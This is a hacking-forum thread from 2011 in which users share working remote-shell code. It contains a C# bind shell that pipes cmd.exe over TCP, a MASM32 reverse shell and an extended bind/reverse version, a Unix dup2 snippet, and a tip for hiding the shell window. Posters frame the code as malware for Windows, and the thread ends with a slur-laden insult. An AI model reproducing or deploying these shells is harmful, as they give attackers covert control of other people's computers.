EvilZone
Programming and Scripting => .NET Framework => : bubzuru November 08, 2011, 03:40:04 PM
-
a very simple remote shell, well commented.
this is why i love the .net framework
compiled size = 6kb :)
//////////////////////////////////
/////////// Tiny Shell ///////////
////////// By Bubzuru ///////////
//////////////////////////////////
using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Diagnostics;
class TinyShell
{
public static NetworkStream stream; //keep this public so we can access it from our event handler
public static void Main()
{
try
{
//Create our TcpListener on port 23
IPAddress localAddr = IPAddress.Parse("127.0.0.1");
TcpListener server = new TcpListener(localAddr, 23);
// Start listening for client requests.
server.Start();
// Buffer for reading data
Byte[] bytes = new Byte[256];
String data = null;
// Enter the listening loop.
while (true)
{
//perform a blocking call to accept requests.
TcpClient client = server.AcceptTcpClient();
//client connected , lets do our shit
data = null;
//CreateProcess cmd.exe with redirected stdin, stdout, stderror
Process CmdProc;
CmdProc = new Process();
CmdProc.StartInfo.FileName = "cmd";
CmdProc.StartInfo.UseShellExecute = false;
CmdProc.StartInfo.RedirectStandardInput = true;
CmdProc.StartInfo.RedirectStandardOutput = true;
CmdProc.StartInfo.RedirectStandardError = true;
CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
//start cmd.exe and begin waiting for output
CmdProc.Start();
CmdProc.BeginOutputReadLine();
CmdProc.BeginErrorReadLine();
//stream writer to send data to cmd.exe
StreamWriter sortStreamWriter = CmdProc.StandardInput;
//set network stream object for reading and writing to\from client
stream = client.GetStream();
int i;
// Loop to receive all the data sent by the client.
while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
{
// Translate data bytes to a ASCII string.
data = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
// send data string (info sent by client) to command prompt
sortStreamWriter.WriteLine(data.Trim());
}
// Shutdown and end connection
client.Close();
}
}
catch (SocketException e)
{
Console.WriteLine("SocketException: {0}", e);
}
}
//This handler will fire everytime our CmdProc writes to stdout,stderror
public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
string[] SplitData = outLine.Data.Split('\n');
foreach (string s in SplitData)
{
byte[] msg = System.Text.Encoding.ASCII.GetBytes(s + "\r\n");
stream.Write(msg, 0, msg.Length);
}
}
}
-
Wow that really frigging simple. Go OOP.
-
yes go OOP
and the way i see it
most malware is writen for windows, and in the near future
all windows computers will have the .net framework installed.
so we might aswell start using it now :)
-
MASM32 reverse shell. Exactly 2kB when stripped. :P
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
; 127.0.0.1:1111
RHOST equ 0100007fh
RPORT equ 5704h
.data
cmd BYTE "cmd",0
.data?
WSAd WSADATA<>
sin sockaddr_in<>
sinfo STARTUPINFO<>
pinfo PROCESS_INFORMATION<>
.code
start:
mov sin.sin_family, AF_INET
mov sin.sin_port, RPORT
mov sin.sin_addr, RHOST
mov sinfo.cb, sizeof STARTUPINFO
mov sinfo.dwFlags, 100h
invoke WSAStartup, 257, ADDR WSAd
invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
mov edi, eax
invoke connect, edi, addr sin, sizeof sockaddr_in
mov sinfo.hStdInput, edi
mov sinfo.hStdOutput, edi
mov sinfo.hStdError, edi
invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
invoke ExitProcess, 0
end start
-
MASM32 reverse shell. Exactly 2kB when stripped. :P
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
; 127.0.0.1:1111
RHOST equ 0100007fh
RPORT equ 5704h
.data
cmd BYTE "cmd",0
.data?
WSAd WSADATA<>
sin sockaddr_in<>
sinfo STARTUPINFO<>
pinfo PROCESS_INFORMATION<>
.code
start:
mov sin.sin_family, AF_INET
mov sin.sin_port, RPORT
mov sin.sin_addr, RHOST
mov sinfo.cb, sizeof STARTUPINFO
mov sinfo.dwFlags, 100h
invoke WSAStartup, 257, ADDR WSAd
invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
mov edi, eax
invoke connect, edi, addr sin, sizeof sockaddr_in
mov sinfo.hStdInput, edi
mov sinfo.hStdOutput, edi
mov sinfo.hStdError, edi
invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
invoke ExitProcess, 0
end start
i have to admit thats sexy , how does it work ?
when i read it , i think i get it but then i think a bit more and i get confused
what part of the code send the stdout to the socket ?
and how is the socket received info , sent into std in ?
any chance of comments ? also is it easier to make a reverse shell than a stander "listener" shell
-
I think the best way to describe it would be in C, redirecting output to a file using CreateProcess(follow the comments):
#include <windows.h>
int main(void)
{
HANDLE hFile;
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
SECURITY_ATTRIBUTES sa;
// required for our file
memset(&sa, 0, sizeof(sa));
sa.bInheritHandle = TRUE;
// Create our file, return HANDLE
hFile = CreateFile(
"out.txt",
GENERIC_WRITE,
FILE_SHARE_WRITE,
&sa,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
// fill the process STARTUPINFO with our handles
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES;
// the important part:
sinfo.hStdOutput = hFile;
sinfo.hStdError = hFile;
// now a new process, with output to hFile
CreateProcess(
NULL,
"cmd.exe /C echo.hello world",
NULL,
NULL,
TRUE,
0,
NULL,
NULL,
&sinfo,
&pinfo);
// cleanup
return 0;
}
After you run, you should see a file "out.txt" containing "hello world". Basically what I did with the socket.
About the bind shell, it's not much harder in C. It's the difference between "connect" & "bind; listen; loop{accept;}"..
This should work for both. Also added a macro "runshell", which should show you the "shell" part of it:
.686
include \masm32\include\masm32rt.inc
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
; 127.0.0.1:1111
RHOST equ 0100007fh
RPORT equ 5704h
; uncomment for bind shell
;LPORT equ 5704h
.data
cmd byte "cmd",0
.data?
WSAd WSADATA<>
sin sockaddr_in<>
sinfo STARTUPINFO<>
pinfo PROCESS_INFORMATION<>
.code
runshell macro sock
mov sinfo.hStdInput, sock
mov sinfo.hStdOutput, sock
mov sinfo.hStdError, sock
invoke CreateProcess, NULL, addr cmd, NULL, NULL, TRUE, 0, NULL, NULL, addr sinfo, addr pinfo
endm
start:
mov sinfo.cb, sizeof STARTUPINFO
mov sinfo.dwFlags, 100h
invoke WSAStartup, 257, addr WSAd
invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0
mov edi, eax
mov sin.sin_family, AF_INET
ifdef LPORT
mov sin.sin_port, LPORT
mov sin.sin_addr, 0
invoke bind, edi, addr sin, sizeof sockaddr_in
invoke listen, edi, 1
@@loop:
invoke WSAAccept, edi, NULL, 0, NULL, NULL
runshell eax
jmp @@loop
else
mov sin.sin_port, RPORT
mov sin.sin_addr, RHOST
invoke connect, edi, addr sin, sizeof sockaddr_in
runshell edi
endif
invoke ExitProcess, 0
end start
Once again 2kB when stripped. MASM is pretty easy to code when using WinAPI.
It might also be easier to visualize it's UNIX counterpart:
// connect()/accept() socket
dup2(sock_fd, fileno(stdin));
dup2(sock_fd, fileno(stdout));
dup2(sock_fd, fileno(stderr));
// or just:
// for(i = 0; i <= 2; i++) dup2(sock_fd, i);
/*
At this point the socket(remote netcat client/server) controls our stdin, stdout, stderr.
So to have a remote shell we simply need to:
*/
system("bash");
-
nice
so we just set the stdin,stdout on our startinfo to the socket handle instead of the file handle ?
but what about stdin ? i had to loop as i got the info from the socket then use a stream to send it to stdin, seems trivial what am i missing ?
-
just been reading more about this
It is also common practice on Windows NT to set the standard handles (standard input, output, or error) of the child process to the socket handle. In such cases, the child process usually does not know that its standard handles are actually sockets.
here is the link for anyone who's intrested
http://support.microsoft.com/kb/150523 (http://support.microsoft.com/kb/150523)
-
I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).
http://www.techpowerup.com/forums/showthread.php?t=62350 (http://www.techpowerup.com/forums/showthread.php?t=62350)
You could probably achieve the C method through C#, something along the lines of:
http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx (http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx)
You'd probably have to do the same to ws2_32(winsock2).
-
I've never worked with the Process Class. Although from a few google searches, I'd guess your doing it right(Although have no clue).
http://www.techpowerup.com/forums/showthread.php?t=62350 (http://www.techpowerup.com/forums/showthread.php?t=62350)
You could probably achieve the C method through C#, something along the lines of:
http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx (http://blogs.msdn.com/b/thottams/archive/2006/08/11/696013.aspx)
You'd probably have to do the same to ws2_32(winsock2).
well in Process class, Process() is just a wrapper for CreateProcess is has the startinfo structures etc so sending the stdin,out,error to the socket can be done i just didn't know when i made that shell.
thanx for the info, gunna make a reverse shell now and try it out
-
well i just tryd to set stdout to a socket handle, guess what happened ?
Cannot implicitly convert type 'System.IntPtr' to 'System.IO.StreamReader'
Property or indexer 'System.Diagnostics.Process.StandardError' cannot be assigned to -- it is read only
guess its not just the same , would have to pinvoke the real CreateProcess ,,, fuck it gunna code this in delphi for fun , not coded it for a while
-
Why do not hide the window?
use:
invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 8000040h, NULL, ....
instead:
invoke CreateProcess, NULL, addr cmd, NULL, NULL, true, 0, NULL, ....
The shell window will not appear..
-
Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).
-
Avoid port 23 if you can. 23 requires admin rights so using a port above 4000 i believe on windows is allowed for anyuser. unless you're running linux in which case all ports are blocked usually (I know this code isnt for linux #CMD but its always useful to know your sudo).
Great post faggot.... I'm sure this helped the user who posted this BACK IN FUCKING 2011!!!!!